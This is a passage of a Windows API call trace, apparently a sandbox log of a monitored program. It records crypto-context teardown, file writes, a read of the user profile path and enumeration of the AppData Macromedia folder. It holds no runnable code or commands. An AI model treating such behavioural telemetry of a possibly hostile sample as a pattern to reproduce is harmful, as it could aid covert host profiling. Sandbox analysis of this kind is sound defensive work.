wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.216] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a71cd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71cd8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0123.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.217] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0123.217] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.217] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0123.217] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.217] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.217] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.217] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0123.217] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.217] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0123.218] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0123.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa210, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0123.218] CryptDestroyKey (hKey=0x9a4880) returned 1 [0123.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.218] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.218] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0123.218] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.218] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0123.218] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.218] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.218] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0123.218] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.218] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0123.218] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.218] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.218] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0123.218] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.218] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.218] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0123.218] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.218] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.219] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0123.219] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.219] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0123.219] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.219] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0123.219] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.219] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0123.219] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.219] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.219] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.219] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.219] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.219] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0123.220] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0123.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.220] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0123.220] FreeLibrary (hLibModule=0x76390000) returned 1 [0123.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.221] CloseHandle (hObject=0x4f4) returned 1 [0123.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.223] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.223] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0123.223] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0123.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0123.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5fa20 [0123.224] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Macromedia", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpFilePart=0x8cedf4*="Macromedia") returned 0x2a [0123.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa20 | out: hHeap=0x2af0000) returned 1 [0123.224] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia")) returned 0x10 [0123.225] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9a47c0 [0123.225] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0123.225] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53ed8d1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0123.225] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53ed8d1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0123.225] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0123.225] GetLastError () returned 0x12 [0123.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0123.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0123.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.225] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0123.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0123.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0123.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0123.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0123.226] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0123.226] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0123.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 